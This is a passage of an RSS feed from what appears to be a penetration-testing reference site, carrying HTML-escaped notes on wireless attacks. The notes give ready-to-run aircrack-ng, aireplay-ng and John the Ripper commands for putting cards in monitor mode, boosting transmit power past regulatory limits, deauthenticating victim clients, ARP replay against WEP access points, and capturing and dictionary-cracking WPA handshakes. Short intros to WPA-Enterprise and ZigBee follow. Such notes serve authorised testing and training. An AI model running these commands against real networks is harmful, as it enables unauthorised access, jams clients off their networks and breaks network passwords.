&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# network card recon&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iwconfig&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;dmesg&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;grep&lt;/span&gt; &lt;span class="mf"&gt;8187&lt;/span&gt; &lt;span class="c"&gt;# alfa card&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Increase Wi-Fi TX Power&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="nb"&gt;set &lt;/span&gt;&lt;span class="n"&gt;B0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iwconfig&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;txpower&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;NmW&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="n"&gt;NdBm&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="n"&gt;off&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="n"&gt;auto&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="c"&gt;# txpower is 30 (usually)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# find SSID and channel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;dev&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;scan&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;grep&lt;/span&gt; &lt;span class="n"&gt;SSID&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;dev&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;scan&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;egrep&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;DS\ Parameter\ set|SSID&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;iwlist&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;scanning&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="n"&gt;egrep&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;ESSID|Channel&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# monitor mode - start&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="c"&gt;# only on a particular channel e.g: 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;Manual&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;dev&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;interface&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt; &lt;span class="nb"&gt;type &lt;/span&gt;&lt;span class="n"&gt;monitor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;Manual&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;iwconfig&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;mode&lt;/span&gt; &lt;span class="n"&gt;monitor&lt;/span&gt; &lt;span class="n"&gt;channel&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ifconfig&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt; &lt;span class="n"&gt;up&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# monitor mode - stop&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="n"&gt;stop&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;Manual&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;iw&lt;/span&gt; &lt;span class="n"&gt;dev&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;interface&lt;/span&gt; &lt;span class="nb"&gt;del &lt;/span&gt;&lt;span class="n"&gt;mon0&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="n"&gt;Manual&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;iwconfig&lt;/span&gt; &lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="n"&gt;mode&lt;/span&gt; &lt;span class="n"&gt;managed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="aircrack-ng-essentials" class="anchored-heading"&gt;Aircrack-ng Essentials&lt;a class="heading-anchor" href="#aircrack-ng-essentials" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Check and kill processes that could interfere with our monitor mode&lt;/p&gt;</description></item><item><title>Wifi - Enterprise Network</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-corporate/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-corporate/</guid><description>&lt;h2 id="wpa-and-wpa2-eap" class="anchored-heading"&gt;WPA and WPA2 EAP&lt;a class="heading-anchor" href="#wpa-and-wpa2-eap" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).&lt;/p&gt;</description></item><item><title>Wifi - WEP Cracking</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-wep/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-wep/</guid><description>&lt;h2 id="cracking-wep-with-a-client" class="anchored-heading"&gt;Cracking WEP with a Client&lt;a class="heading-anchor" href="#cracking-wep-with-a-client" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="arp-request-replay-attack" class="anchored-heading"&gt;ARP Request Replay Attack&lt;a class="heading-anchor" href="#arp-request-replay-attack" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Attack the ACCESS POINT&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="c"&gt;# only a particular channel : 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airodump-ng&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-bssid&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="n"&gt;arpreplay&lt;/span&gt; &lt;span class="c"&gt;# dump traffic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Fake authentication for a more reliable attack&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aireplay-ng&lt;/span&gt; &lt;span class="mf"&gt;-1&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;$AP_SSID&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-h&lt;/span&gt; &lt;span class="nv"&gt;$ATTACKER_MAC&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# ARP replay attack&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aireplay-ng&lt;/span&gt; &lt;span class="mf"&gt;-3&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-h&lt;/span&gt; &lt;span class="nv"&gt;$ATTACKER_MAC&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Deauthentication&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aireplay-ng&lt;/span&gt; &lt;span class="mf"&gt;-0&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="nv"&gt;$VICTIM_MAC&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Cracking&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="n"&gt;arpreplay&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="interactive-replay-attack" class="anchored-heading"&gt;Interactive replay attack&lt;a class="heading-anchor" href="#interactive-replay-attack" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.&lt;/p&gt;</description></item><item><title>Wifi - WPA Cracking</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-wpa/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/wifi/wifi-wpa/</guid><description>&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/aircrack-ng/aircrack-ng"&gt;aircrack-ng/aircrack-ng&lt;/a&gt; - WiFi security auditing tools suite&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/bettercap/bettercap"&gt;bettercap/bettercap&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="wpa-psk-attack" class="anchored-heading"&gt;WPA PSK Attack&lt;a class="heading-anchor" href="#wpa-psk-attack" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="cracking-wpa-with-john-the-ripper" class="anchored-heading"&gt;Cracking WPA with John the Ripper&lt;a class="heading-anchor" href="#cracking-wpa-with-john-the-ripper" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# put into monitor mode on our desired channel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airmon-ng&lt;/span&gt; &lt;span class="nb"&gt;start &lt;/span&gt;&lt;span class="n"&gt;wlan0&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="c"&gt;# only a particular channel : 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airodump-ng&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="mf"&gt;3&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-bssid&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="n"&gt;wpajohn&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt; &lt;span class="c"&gt;# see no client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aireplay-ng&lt;/span&gt; &lt;span class="mf"&gt;-0&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="n"&gt;-a&lt;/span&gt; &lt;span class="nv"&gt;$AP_MAC&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="nv"&gt;$VICTIM_MAC&lt;/span&gt; &lt;span class="n"&gt;mon0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# crack without john the ripper (-b &amp;lt;BSSID&amp;gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="mf"&gt;-0&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;pentest&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;passwords&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lst&lt;/span&gt; &lt;span class="n"&gt;wpajohn&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;lst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;secondlist&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;wpajohn&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt; &lt;span class="c"&gt;# multiple dicts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# crack with john the ripper - combine mangling rules with aircrack&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# rules example to add in /pentest/passwords/john/john.conf&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# $[0-9]$[0-9]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# $[0-9]$[0-9]$[0-9]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;john&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-wordlist&lt;/span&gt;&lt;span class="p"&gt;=/&lt;/span&gt;&lt;span class="n"&gt;pentest&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;wireless&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lst&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-rules&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-stdout&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="mf"&gt;-0&lt;/span&gt; &lt;span class="n"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;$AP_SSID&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;wpajohn&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;&lt;span class="n"&gt;wifu&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;essid&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airolib-ng&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-import&lt;/span&gt; &lt;span class="n"&gt;essid&lt;/span&gt; &lt;span class="n"&gt;essid&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airolib-ng&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-stats&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airolib-ng&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-import&lt;/span&gt; &lt;span class="n"&gt;passwd&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;pentest&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;passwords&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lst&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airolib-ng&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-batch&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;airolib-ng&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-stats&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;db&lt;/span&gt; &lt;span class="n"&gt;wpajohn&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# airolib-ng test.db --clean all&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Not in lab - Convert to hccap to use with John Jumbo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;aircrack-ng&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;.&lt;/span&gt;&lt;span class="py"&gt;cap&lt;/span&gt; &lt;span class="n"&gt;-J&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;outFile&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hccap2john&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;outFile&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;.&lt;/span&gt;&lt;span class="py"&gt;hccap&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;JohnOutFile&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;john&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;JohnOutFile&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="cracking-wpa-with-cowpatty" class="anchored-heading"&gt;Cracking WPA with coWPAtty&lt;a class="heading-anchor" href="#cracking-wpa-with-cowpatty" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Better for PMK Rainbow table attacks&lt;/p&gt;</description></item><item><title>ZigBee</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/zigbee/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/zigbee/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Zigbee is a specification for a suite of high-level communication protocols using low-power digital radios. It&amp;rsquo;s designed for use in areas like home automation, medical data collection, industrial control systems, and other applications that require secure and reliable wireless communication.&lt;/p&gt;
&lt;/blockquote&gt;
